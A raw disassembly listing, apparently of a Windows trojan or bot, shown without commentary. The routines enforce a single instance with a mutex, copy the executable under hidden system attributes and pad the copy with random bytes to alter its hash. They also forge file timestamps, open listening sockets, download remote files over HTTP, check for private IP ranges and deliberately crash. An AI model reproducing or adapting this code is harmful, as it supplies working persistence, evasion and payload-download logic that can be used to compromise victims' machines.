jnz short loc_4167AA
or dword ptr [ebp-4], 1
loc_4167AA: ; CODE XREF: .data:00416799�j
; .data:0041679F�j ...
inc edx
cmp edx, eax
jb short loc_416793
loc_4167AF: ; CODE XREF: .data:00416791�j
push eax
push esi
call sub_41A8D2
pop ecx
pop ecx
loc_4167B8: ; CODE XREF: .data:0041676A�j
; .data:00416788�j
mov eax, dword_40FB34
push dword ptr [eax+34h]
push 1
push offset dword_40FD24
call dword_40FD7C ; CreateMutexW
mov [ebp-0Ch], eax
call dword_40FD78 ; RtlGetLastWin32Error
test eax, eax
jnz loc_416B37
call sub_41664D
mov [ebp+17h], al
mov eax, dword_40FB34
mov [ebp-8], ebx
push dword ptr [eax+30h]
mov [ebp+1Bh], bl
call sub_41AAAE
test al, al
pop ecx
jz loc_4168C8
test byte ptr [ebp-4], 1
jnz short loc_41683B
mov eax, dword_40FB34
push ebx
push ebx
push ebx
push ebx
push 1
push dword ptr [eax+30h]
call sub_41AAD0
mov ecx, dword_40FC1C
add esp, 18h
cmp eax, [ecx+40h]
jb short loc_41683B
push dword ptr [ebp-0Ch]
call dword_40FDAC ; CloseHandle
push ebx
call dword ptr [ebp+0Ch]
jmp loc_4168C8
; ---------------------------------------------------------------------------
loc_41683B: ; CODE XREF: .data:00416806�j
; .data:00416827�j
push ebx
push ebx
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
mov eax, dword_40FB34
mov [ebp-4], ebx
push 0Bh
push dword ptr [eax+30h]
call sub_41AAD0
mov eax, dword_40FB34
add esp, 18h
cmp [ebp+17h], bl
push ebx
push ebx
push ebx
push ebx
jz short loc_416877
push 9
push dword ptr [eax+30h]
call sub_41AAD0
add esp, 18h
jmp short loc_4168AD
; ---------------------------------------------------------------------------
loc_416877: ; CODE XREF: .data:00416866�j
push 3
push dword ptr [eax+30h]
call sub_41AAD0
mov eax, dword_40FB34
push dword ptr [eax+30h]
call sub_41AAAE
add esp, 1Ch
jmp short loc_4168A9
; ---------------------------------------------------------------------------
loc_416893: ; CODE XREF: .data:004168AB�j
push 14h
call dword_40FD68 ; Sleep
mov eax, dword_40FB34
push dword ptr [eax+30h]
call sub_41AAAE
pop ecx
loc_4168A9: ; CODE XREF: .data:00416891�j
test al, al
jnz short loc_416893
loc_4168AD: ; CODE XREF: .data:00416875�j
cmp [ebp-4], ebx
mov byte ptr [ebp+1Bh], 1
jz short loc_4168C8
push dword ptr [ebp-4]
call sub_41B052
push dword ptr [ebp-4]
call sub_41A83D
pop ecx
pop ecx
loc_4168C8: ; CODE XREF: .data:004167FC�j
; .data:00416836�j ...
push edi
push 104h
lea eax, [ebp-43Ch]
push eax
push ebx
call dword_40FD70 ; GetModuleFileNameW
lea eax, [ebp-234h]
push eax
call sub_41B296
pop ecx
lea eax, [ebp-234h]
push eax
lea eax, [ebp-43Ch]
push eax
call dword_40FD88 ; lstrcmpiW
test eax, eax
lea eax, [ebp-234h]
push eax
jz loc_416A79
call sub_41B3DB
lea eax, [ebp-234h]
push eax
call sub_41B052
pop ecx
pop ecx
push ebx
lea eax, [ebp-234h]
push eax
lea eax, [ebp-43Ch]
push eax
call dword_40FD6C ; CopyFileW
push 24h
lea eax, [ebp-234h]
push eax
call dword_40FDB4 ; SetFileAttributesW
push ebx
push ebx
push 3
push ebx
push 1
push 40000000h
lea eax, [ebp-234h]
push eax
call dword_40FDC0 ; CreateFileW
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_416A68
push 2
push ebx
push ebx
push eax
call dword_40FDC8 ; SetFilePointer
test eax, eax
jz short loc_4169E8
push 400h
push 40h
call sub_41B0BA
pop ecx
shl eax, 9
pop ecx
mov [ebp-8], eax
jz short loc_41699B
push eax
call sub_41A81F
mov edi, eax
mov eax, [ebp-8]
pop ecx
jmp short loc_41699D
; ---------------------------------------------------------------------------
loc_41699B: ; CODE XREF: .data:0041698B�j
xor edi, edi
loc_41699D: ; CODE XREF: .data:00416999�j
cmp edi, ebx
jz short loc_4169E8
xor esi, esi
cmp eax, ebx
jbe short loc_4169C8
loc_4169A7: ; CODE XREF: .data:004169C6�j
push 0FFh
push 1
call sub_41B0BA
push eax
push ebx
call sub_41B0BA
add esp, 10h
mov [esi+edi], al
mov eax, [ebp-8]
inc esi
cmp esi, eax
jb short loc_4169A7
loc_4169C8: ; CODE XREF: .data:004169A5�j
push ebx
lea ecx, [ebp-8]
push ecx
push eax
push edi
push dword ptr [ebp-4]
call dword_40FDF0 ; WriteFile
push dword ptr [ebp-4]
call dword_40FE00 ; FlushFileBuffers
push edi
call sub_41A83D
pop ecx
loc_4169E8: ; CODE XREF: .data:00416975�j
; .data:0041699F�j
push 1
push 25h
lea eax, [ebp-43Ch]
push eax
push ebx
call dword_40FBA8
mov eax, dword_40FB34
push dword ptr [eax+6Ch]
lea eax, [ebp-43Ch]
push eax
push eax
call dword_40FC8C
push ebx
push ebx
push 3
push ebx
push 3
push 80000000h
lea eax, [ebp-43Ch]
push eax
call dword_40FDC0 ; CreateFileW
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_416A5F
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-24h]
push eax
push esi
call dword_40FEA8 ; GetFileTime
lea eax, [ebp-2Ch]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-24h]
push eax
push dword ptr [ebp-4]
call dword_40FEA4 ; SetFileTime
push esi
call dword_40FDAC ; CloseHandle
loc_416A5F: ; CODE XREF: .data:00416A2E�j
push dword ptr [ebp-4]
call dword_40FDAC ; CloseHandle
loc_416A68: ; CODE XREF: .data:00416962�j
push 21h
lea eax, [ebp-234h]
push eax
call dword_40FDB4 ; SetFileAttributesW
jmp short loc_416A82
; ---------------------------------------------------------------------------
loc_416A79: ; CODE XREF: .data:00416906�j
mov [ebp+17h], bl
call sub_41B3DB
pop ecx
loc_416A82: ; CODE XREF: .data:00416A77�j
cmp [ebp+17h], bl
jz short loc_416AAB
cmp [ebp+1Bh], bl
jz loc_416B36
mov eax, dword_40FB34
push ebx
push ebx
push ebx
push ebx
push 0Ah
push dword ptr [eax+30h]
call sub_41AAD0
add esp, 18h
jmp loc_416B36
; ---------------------------------------------------------------------------
loc_416AAB: ; CODE XREF: .data:00416A85�j
mov eax, dword_40FC20
mov ecx, dword_40FB34
and eax, 1
or eax, 2
push dword ptr [ecx+eax*8]
call sub_41C395
mov edi, eax
mov esi, offset sub_4057EE
push ebx
mov eax, esi
sub eax, dword_40FCB0
push edi
push eax
call sub_4182DE
add esp, 10h
jmp short loc_416AFB
; ---------------------------------------------------------------------------
loc_416AE0: ; CODE XREF: .data:00416AFD�j
push 14h
call dword_40FD68 ; Sleep
push ebx
mov eax, esi
sub eax, dword_40FCB0
push edi
push eax
call sub_4182DE
add esp, 0Ch
loc_416AFB: ; CODE XREF: .data:00416ADE�j
test al, al
jz short loc_416AE0
jmp short loc_416B09
; ---------------------------------------------------------------------------
loc_416B01: ; CODE XREF: .data:00416B19�j
push 14h
call dword_40FD68 ; Sleep
loc_416B09: ; CODE XREF: .data:00416AFF�j
mov eax, dword_40FB34
push dword ptr [eax+2Ch]
call sub_41AAAE
test al, al
pop ecx
jz short loc_416B01
call sub_41C9C6
call sub_416293
push ebx
push ebx
push ebx
call sub_416137
push ebx
call sub_4148E2
add esp, 10h
loc_416B36: ; CODE XREF: .data:00416A8A�j
; .data:00416AA6�j
pop edi
loc_416B37: ; CODE XREF: .data:004167D8�j
cmp [ebp-0Ch], ebx
jz short loc_416B45
push dword ptr [ebp-0Ch]
call dword_40FDAC ; CloseHandle
loc_416B45: ; CODE XREF: .data:00416B3A�j
push ebx
call dword ptr [ebp+0Ch]
pop esi
pop ebx
locret_416B4B: ; CODE XREF: .data:00416707�j
leave
retn 14h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416B4F proc near ; CODE XREF: .data:00416C84�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
cmp [esi], ebx
jnz short loc_416B90
mov [ebp+var_1], bl
loc_416B5D: ; CODE XREF: sub_416B4F+38�j
push ebx
push ebx
push 4
push ebx
push ebx
push 80000000h
push [ebp+arg_0]
call dword_40FDC0 ; CreateFileW
cmp eax, 0FFFFFFFFh
mov [esi], eax
jnz short loc_416B90
push 14h
call dword_40FD68 ; Sleep
inc [ebp+var_1]
cmp [ebp+var_1], 14h
jb short loc_416B5D
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_416B90
mov [esi], ebx
loc_416B90: ; CODE XREF: sub_416B4F+9�j
; sub_416B4F+27�j ...
pop ebx
leave
retn
sub_416B4F endp
; =============== S U B R O U T I N E =======================================
sub_416B93 proc near ; CODE XREF: .data:00416C9B�p
mov eax, [esi]
test eax, eax
jz short locret_416BA3
push eax
call dword_40FDAC ; CloseHandle
and dword ptr [esi], 0
locret_416BA3: ; CODE XREF: sub_416B93+4�j
retn
sub_416B93 endp
; =============== S U B R O U T I N E =======================================
sub_416BA4 proc near ; CODE XREF: .data:00416CCF�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_40FD90 ; lstrlenW
lea eax, [eax+eax+2]
mov [esi], eax
push dword ptr [edi]
call sub_41A83D
push dword ptr [esi]
push [esp+8+arg_0]
call sub_41A893
add esp, 0Ch
test eax, eax
mov [edi], eax
jnz short locret_416BD1
and [esi], eax
locret_416BD1: ; CODE XREF: sub_416BA4+29�j
retn
sub_416BA4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, [ebp+8]
cmp eax, 1
push esi
push edi
jnz short loc_416BEF
mov eax, [ebp+10h]
and dword ptr [eax], 0
mov eax, dword_40FC1C
mov eax, [eax+40h]
jmp short loc_416C1D
; ---------------------------------------------------------------------------
loc_416BEF: ; CODE XREF: .data:00416BDD�j
cmp eax, 2
jnz short loc_416C04
mov eax, [ebp+10h]
and dword ptr [eax], 0
mov eax, dword_40FC1C
mov eax, [eax+44h]
jmp short loc_416C1D
; ---------------------------------------------------------------------------
loc_416C04: ; CODE XREF: .data:00416BF2�j
cmp eax, 3
jnz short loc_416C21
push dword_40F868
call dword_40FDBC ; SetEvent
loc_416C15: ; CODE XREF: .data:00416CDD�j
mov eax, [ebp+10h]
and dword ptr [eax], 0
loc_416C1B: ; CODE XREF: .data:00416CA0�j
; .data:00416CD5�j
xor eax, eax
loc_416C1D: ; CODE XREF: .data:00416BED�j
; .data:00416C02�j ...
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_416C21: ; CODE XREF: .data:00416C07�j
cmp eax, 4
jnz short loc_416C33
mov eax, [ebp+10h]
and dword ptr [eax], 0
mov eax, dword_40FCA4
jmp short loc_416C1D
; ---------------------------------------------------------------------------
loc_416C33: ; CODE XREF: .data:00416C24�j
cmp eax, 5
jnz short loc_416C45
push dword_40F860
mov esi, offset dword_40F86C
jmp short loc_416C7E
; ---------------------------------------------------------------------------
loc_416C45: ; CODE XREF: .data:00416C36�j
cmp eax, 6
jnz short loc_416C51
mov esi, offset dword_40F86C
jmp short loc_416C95
; ---------------------------------------------------------------------------
loc_416C51: ; CODE XREF: .data:00416C48�j
cmp eax, 7
jnz short loc_416C63
push dword_40F864
mov esi, offset dword_40FA7C
jmp short loc_416C7E
; ---------------------------------------------------------------------------
loc_416C63: ; CODE XREF: .data:00416C54�j
cmp eax, 8
jnz short loc_416C6F
mov esi, offset dword_40FA7C
jmp short loc_416C95
; ---------------------------------------------------------------------------
loc_416C6F: ; CODE XREF: .data:00416C66�j
cmp eax, 0Ah
jnz short loc_416C8B
push offset dword_40F870
mov esi, offset dword_40FA78
loc_416C7E: ; CODE XREF: .data:00416C43�j
; .data:00416C61�j
mov eax, [ebp+10h]
and dword ptr [eax], 0
call sub_416B4F
jmp short loc_416CD4
; ---------------------------------------------------------------------------
loc_416C8B: ; CODE XREF: .data:00416C72�j
cmp eax, 9
jnz short loc_416CA5
mov esi, offset dword_40FA78
loc_416C95: ; CODE XREF: .data:00416C4F�j
; .data:00416C6D�j
mov eax, [ebp+10h]
and dword ptr [eax], 0
call sub_416B93
jmp loc_416C1B
; ---------------------------------------------------------------------------
loc_416CA5: ; CODE XREF: .data:00416C8E�j
cmp eax, 0Bh
jnz short loc_416CB1
push offset dword_40F870
jmp short loc_416CC9
; ---------------------------------------------------------------------------
loc_416CB1: ; CODE XREF: .data:00416CA8�j
cmp eax, 0Ch
jnz short loc_416CBE
push dword_40F860
jmp short loc_416CC9
; ---------------------------------------------------------------------------
loc_416CBE: ; CODE XREF: .data:00416CB4�j
cmp eax, 0Dh
jnz short loc_416CDA
push dword_40F864
loc_416CC9: ; CODE XREF: .data:00416CAF�j
; .data:00416CBC�j
mov esi, [ebp+10h]
mov edi, [ebp+0Ch]
call sub_416BA4
loc_416CD4: ; CODE XREF: .data:00416C89�j
pop ecx
jmp loc_416C1B
; ---------------------------------------------------------------------------
loc_416CDA: ; CODE XREF: .data:00416CC1�j
cmp eax, 0Eh
jnz loc_416C15
mov eax, [ebp+10h]
and dword ptr [eax], 0
mov eax, dword_40FB34
push dword ptr [eax+78h]
push dword_40FD30
call dword_40FD04 ; GetProcAddress
test eax, eax
jz short loc_416D08
push 8007h
call eax ; dword_40FB34
loc_416D08: ; CODE XREF: .data:00416CFF�j
xor eax, eax
mov [eax], eax
xor eax, eax
loc_416D0E: ; CODE XREF: .data:00416D12�j
mov byte ptr [eax], 0
inc eax
jmp short loc_416D0E
; ---------------------------------------------------------------------------
dd 56555351h, 0E8016A57h, 52DAh, 56F63359h, 56016A56h
dd 0FDC415FFh, 70BB0040h, 530040F8h, 40F868A3h, 4558E800h
dd 56590000h, 56036A56h, 0BF56h, 53578000h, 0FDC015FFh
dd 78A30040h, 0E80040FAh, 4634h, 0FFDC65E8h, 6A5656FFh
dd 57565604h, 0F860A350h, 15FF0040h, 40FDC0h, 0A3FFF883h
dd 40F86Ch, 35890675h, 40F86Ch, 5C3DE8h, 6A565600h, 57565604h
dd 0F864A350h, 15FF0040h, 40FDC0h, 0A3FFF883h, 40FA7Ch
dd 35890675h, 40FA7Ch, 40FB34A1h, 3070FF00h, 4056AC68h
dd 50C7E800h, 44890000h, 34A11824h, 0FF0040FBh, 0DFE82C70h
dd 8300003Ch, 0C0840CC4h, 34A13F74h, 560040FBh, 6A565656h
dd 2C70FF03h, 3CE7E8h, 0FB34A100h, 70FF0040h, 3CB8E82Ch
dd 0C4830000h, 6A16EB1Ch, 6815FF14h, 0A10040FDh, 40FB34h
dd 0E82C70FFh, 3C9Eh, 75C08459h, 87B5BFE6h, 34A10040h
dd 0FF0040FBh, 87E82C70h, 8400003Ch, 707559C0h, 40FC20A1h
dd 340D8B00h, 240040FBh, 1BD8F601h, 83D8F7C0h, 34FF05C0h
dd 554BE881h, 0E88B0000h, 2BC78B56h, 40FCB005h, 0E8505500h
dd 1482h, 0EB10C483h, 0FF146A1Bh, 40FD6815h, 0C78B5600h
dd 0FCB0052Bh, 50550040h, 1465E8h, 0CC48300h, 0E174C084h
dd 146A08EBh, 0FD6815FFh, 34A10040h, 0FF0040FBh, 17E82C70h
dd 8400003Ch, 0E67459C0h, 4539E853h, 6A590000h, 6815FF64h
dd 6A0040FDh, 6835FF32h, 0FF0040F8h, 40FDB815h, 0FC08500h
dd 0FFFF5985h, 0FB34A1FFh, 56560040h, 36A5656h, 0E82C70FFh
dd 3BFCh, 40FB34A1h, 2C70FF00h, 3BCDE8h, 1CC48300h, 5B5D5E5Fh
dd 146A16EBh, 0FD6815FFh, 34A10040h, 0FF0040FBh, 0AFE82C70h
dd 5900003Bh, 0E675C084h, 0F86835FFh, 15FF0040h, 40FDACh
dd 0F86C35FFh, 15FF0040h, 40FDACh, 0FA7C35FFh, 15FF0040h
dd 40FDACh, 0FA7835FFh, 15FF0040h, 40FDACh, 0A12434FFh
dd 40FB34h, 0E83070FFh, 5024h, 0C30CC483h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push esi
push 6
push 1
push 2
call dword_40FCD4
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_416FAD
lea eax, [ebp-10h]
push 10h
push eax
call sub_41BE72
mov ax, [ebp+8]
pop ecx
pop ecx
rol ax, 8
mov [ebp-0Eh], ax
push 10h
lea eax, [ebp-10h]
push eax
push esi
mov word ptr [ebp-10h], 2
call dword_40FCD8
cmp eax, 0FFFFFFFFh
jz short loc_416FA1
push 0Ah
push esi
call dword_40FCDC
cmp eax, 0FFFFFFFFh
jnz short loc_416FAD
loc_416FA1: ; CODE XREF: .data:00416F91�j
push esi
call dword_40FCC0
or eax, 0FFFFFFFFh
jmp short loc_416FAF
; ---------------------------------------------------------------------------
loc_416FAD: ; CODE XREF: .data:00416F60�j
; .data:00416F9F�j
mov eax, esi
loc_416FAF: ; CODE XREF: .data:00416FAB�j
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416FB2 proc near ; CODE XREF: sub_417048+1C�p
; .data:004195C7�p ...
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10Ch
mov ecx, [ebp+arg_C]
push esi
mov eax, ecx
xor edx, edx
mov esi, 3E8h
div esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
inc esi
mov [ebp+var_10C], esi
mov [ebp+var_108], edi
mov [ebp+var_8], eax
imul eax, 3E8h
sub ecx, eax
lea eax, [ebp+var_8]
push eax
push 0
push 0
lea eax, [ebp+var_10C]
push eax
push 0
mov [ebp+var_4], ecx
call dword_40FCF4
cmp eax, esi
jz short loc_41700A
xor eax, eax
jmp short loc_417019
; ---------------------------------------------------------------------------
loc_41700A: ; CODE XREF: sub_416FB2+52�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call dword_40FCEC
loc_417019: ; CODE XREF: sub_416FB2+56�j
pop edi
pop esi
leave
retn
sub_416FB2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push eax
push eax
push eax
push eax
xor ecx, ecx
cmp [ebp+0Ch], al
push eax
push 4
setz cl
lea eax, [ebp+0Ch]
push eax
push 8004667Eh
push dword ptr [ebp+8]
mov [ebp+0Ch], ecx
call dword_40FCF0
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417048 proc near ; CODE XREF: .data:0041912B�p
; .data:00419228�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push esi
xor esi, esi
cmp [ebp+arg_8], esi
mov [ebp+var_1], 0
jle short loc_417084
loc_417058: ; CODE XREF: sub_417048+3A�j
push [ebp+arg_C]
lea eax, [ebp+var_1]
push 1
push eax
push [ebp+arg_0]
call sub_416FB2
add esp, 10h
cmp eax, 1
jl short loc_417089
mov al, [ebp+var_1]
mov ecx, [ebp+arg_4]
mov [esi+ecx], al
inc esi
cmp al, 0Ah
jz short loc_417084
cmp esi, [ebp+arg_8]
jl short loc_417058
loc_417084: ; CODE XREF: sub_417048+E�j
; sub_417048+35�j
mov eax, esi
loc_417086: ; CODE XREF: sub_417048+44�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_417089: ; CODE XREF: sub_417048+27�j
or eax, 0FFFFFFFFh
jmp short loc_417086
sub_417048 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_41708E proc near ; CODE XREF: .data:loc_419586�p
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 10Ch
push ebx
mov ebx, [ebp+6Ch+arg_0]
push esi
xor esi, esi
push edi
mov edi, [ebp+6Ch+arg_4]
mov [ebp+6Ch+var_8], 118h
mov [ebp+6Ch+var_4], esi
jmp short loc_4170FA
; ---------------------------------------------------------------------------
loc_4170B0: ; CODE XREF: sub_41708E+6A�j
dec [ebp+6Ch+var_10C]
mov eax, [ebp+6Ch+var_10C]
mov eax, [ebp+eax*4+6Ch+var_108]
cmp eax, edi
mov [ebp+6Ch+arg_4], ebx
jz short loc_4170CD
mov [ebp+6Ch+arg_4], edi
loc_4170CD: ; CODE XREF: sub_41708E+3A�j
push esi
push 1000h
push [ebp+6Ch+arg_8]
push eax
call dword_40FCEC
cmp eax, 1
jl short loc_417129
push esi
push eax
push [ebp+6Ch+arg_8]
push [ebp+6Ch+arg_4]
call dword_40FCBC
jmp short loc_417124
; ---------------------------------------------------------------------------
loc_4170F2: ; CODE XREF: sub_41708E+99�j
cmp [ebp+6Ch+var_10C], esi
jnz short loc_4170B0
loc_4170FA: ; CODE XREF: sub_41708E+20�j
lea eax, [ebp+6Ch+var_8]
push eax
push esi
push esi
lea eax, [ebp+6Ch+var_10C]
push eax
push esi
mov [ebp+6Ch+var_10C], 2
mov [ebp+6Ch+var_108], edi
mov [ebp+6Ch+var_104], ebx
call dword_40FCF4
loc_417124: ; CODE XREF: sub_41708E+62�j
cmp eax, 1
jge short loc_4170F2
loc_417129: ; CODE XREF: sub_41708E+52�j
pop edi
pop esi
pop ebx
add ebp, 6Ch
leave
retn
sub_41708E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417131 proc near ; CODE XREF: sub_417186+44�p
; sub_4178FE+1D2�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push esi
xor esi, esi
cmp [ebp+arg_8], esi
jbe short loc_41717D
loc_41713D: ; CODE XREF: sub_417131+4A�j
cmp [ebp+arg_C], 0
jz short loc_417152
push 0
push [ebp+arg_C]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_417182
loc_417152: ; CODE XREF: sub_417131+10�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+arg_8]
sub eax, esi
push eax
mov eax, [ebp+arg_4]
add eax, esi
push eax
push [ebp+arg_0]
call dword_40FB54
test eax, eax
jz short loc_417182
cmp [ebp+var_4], 0
jz short loc_41717D
add esi, [ebp+var_4]
cmp esi, [ebp+arg_8]
jb short loc_41713D
loc_41717D: ; CODE XREF: sub_417131+A�j
; sub_417131+42�j
mov eax, esi
loc_41717F: ; CODE XREF: sub_417131+53�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_417182: ; CODE XREF: sub_417131+1F�j
; sub_417131+3C�j
xor eax, eax
jmp short loc_41717F
sub_417131 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417186 proc near ; CODE XREF: sub_4176F7+100�p
; .data:0041D867�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push 0
push 84043300h
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40FB44
test eax, eax
mov [ebp+var_4], eax
jnz short loc_4171AA
leave
retn
; ---------------------------------------------------------------------------
loc_4171AA: ; CODE XREF: sub_417186+20�j
push esi
push edi
push [ebp+arg_C]
xor edi, edi
call sub_41A81F
test eax, eax
mov esi, [ebp+arg_8]
pop ecx
mov [esi], eax
jz short loc_4171E2
push [ebp+arg_10]
push [ebp+arg_C]
push eax
push [ebp+var_4]
call sub_417131
mov edi, eax
add esp, 10h
test edi, edi
jnz short loc_4171E2
push dword ptr [esi]
call sub_41A83D
and [esi], edi
pop ecx
loc_4171E2: ; CODE XREF: sub_417186+38�j
; sub_417186+50�j
push [ebp+var_4]
call dword_40FB40
mov eax, edi
pop edi
pop esi
leave
retn
sub_417186 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4171F1 proc near ; CODE XREF: sub_414C49+1B�p
; sub_4172E5+29�p
var_410 = byte ptr -410h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 410h
push ebx
push esi
xor ebx, ebx
push ebx
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push 20000013h
push [ebp+arg_0]
mov [ebp+var_8], 4
mov [ebp+var_C], ebx
call dword_40FB60
test eax, eax
jz loc_4172DF
cmp [ebp+var_C], 0C8h
jnz loc_4172DF
push ebx
push 80h
push 2
push ebx
push ebx
push 40000000h
push [ebp+arg_4]
call dword_40FDC0 ; CreateFileW
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_4172DF
mov [ebp+var_1], bl
loc_41725A: ; CODE XREF: sub_4171F1+C6�j
push ebx
push [ebp+arg_8]
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jz short loc_417285
lea eax, [ebp+var_8]
push eax
push 400h
lea eax, [ebp+var_410]
push eax
push [ebp+arg_0]
call dword_40FB54
test eax, eax
jnz short loc_417289
loc_417285: ; CODE XREF: sub_4171F1+75�j
mov [ebp+var_1], 1
loc_417289: ; CODE XREF: sub_4171F1+92�j
cmp [ebp+var_8], ebx
jz short loc_4172B9
push ebx
lea eax, [ebp+var_10]
push eax
push [ebp+var_8]
lea eax, [ebp+var_410]
push eax
push esi
call dword_40FDF0 ; WriteFile
test eax, eax
jz short loc_4172B0
mov eax, [ebp+var_10]
cmp eax, [ebp+var_8]
jz short loc_4172B4
loc_4172B0: ; CODE XREF: sub_4171F1+B5�j
mov [ebp+var_1], 1
loc_4172B4: ; CODE XREF: sub_4171F1+BD�j
cmp [ebp+var_1], bl
jz short loc_41725A
loc_4172B9: ; CODE XREF: sub_4171F1+9B�j
push esi
call dword_40FE00 ; FlushFileBuffers
push esi
call dword_40FDAC ; CloseHandle
cmp [ebp+var_1], bl
jz short loc_4172D5
push [ebp+arg_4]
call sub_41B052
pop ecx
loc_4172D5: ; CODE XREF: sub_4171F1+D9�j
xor eax, eax
cmp [ebp+var_1], bl
setz al
jmp short loc_4172E1
; ---------------------------------------------------------------------------
loc_4172DF: ; CODE XREF: sub_4171F1+30�j
; sub_4171F1+3D�j ...
xor al, al
loc_4172E1: ; CODE XREF: sub_4171F1+EC�j
pop esi
pop ebx
leave
retn
sub_4171F1 endp
; =============== S U B R O U T I N E =======================================
sub_4172E5 proc near ; CODE XREF: sub_414C49+19C�p
; .data:0041870D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
xor ebx, ebx
push ebx
push 84043300h
push ebx
push ebx
push [esp+18h+arg_8]
push [esp+1Ch+arg_0]
call dword_40FB44
mov esi, eax
cmp esi, ebx
jz short loc_41731F
push [esp+8+arg_C]
push [esp+0Ch+arg_4]
push esi
call sub_4171F1
add esp, 0Ch
push esi
mov bl, al
call dword_40FB40
loc_41731F: ; CODE XREF: sub_4172E5+1E�j
pop esi
mov al, bl
pop ebx
retn
sub_4172E5 endp
; =============== S U B R O U T I N E =======================================
sub_417324 proc near ; CODE XREF: sub_4176F7+91�p
; sub_41FC7E+294�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, [eax+4]
cmp dl, 0Ah
jz short loc_41735B
cmp dl, 0C0h
jnz short loc_41733B
cmp byte ptr [eax+5], 0A8h
jz short loc_41735B
loc_41733B: ; CODE XREF: sub_417324+F�j
cmp dl, 0ACh
jnz short loc_41734D
mov cl, [eax+5]
cmp cl, 0Fh
jbe short loc_41734D
cmp cl, 20h
jb short loc_41735B
loc_41734D: ; CODE XREF: sub_417324+1A�j
; sub_417324+22�j
cmp dl, 7Fh
jnz short loc_417358
cmp byte ptr [eax+5], 0
jz short loc_41735B
loc_417358: ; CODE XREF: sub_417324+2C�j
xor al, al
retn
; ---------------------------------------------------------------------------
loc_41735B: ; CODE XREF: sub_417324+A�j
; sub_417324+15�j ...
mov al, 1
retn
sub_417324 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41735E proc near ; CODE XREF: sub_414C49+217�p
var_22C = byte ptr -22Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 22Ch
push ebx
push edi
push 1
push 25h
lea eax, [ebp+var_22C]
push eax
xor ebx, ebx
push ebx
call dword_40FBA8
mov eax, dword_40FB34
push dword ptr [eax+180h]
lea eax, [ebp+var_22C]
push eax
push eax
call dword_40FC8C
push ebx
push ebx
push 4
push ebx
push 1
push 0C0000000h
lea eax, [ebp+var_22C]
push eax
call dword_40FDC0 ; CreateFileW
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_41766A
push esi
push ebx
push edi
call dword_40FDFC ; GetFileSize
push eax
mov [ebp+var_8], eax
call sub_41A81F
mov esi, eax
cmp esi, ebx
pop ecx
mov [ebp+var_24], esi
jz loc_417660
push ebx
lea eax, [ebp+var_8]
push eax
push [ebp+var_8]
push esi
push edi
call dword_40FDF4 ; ReadFile
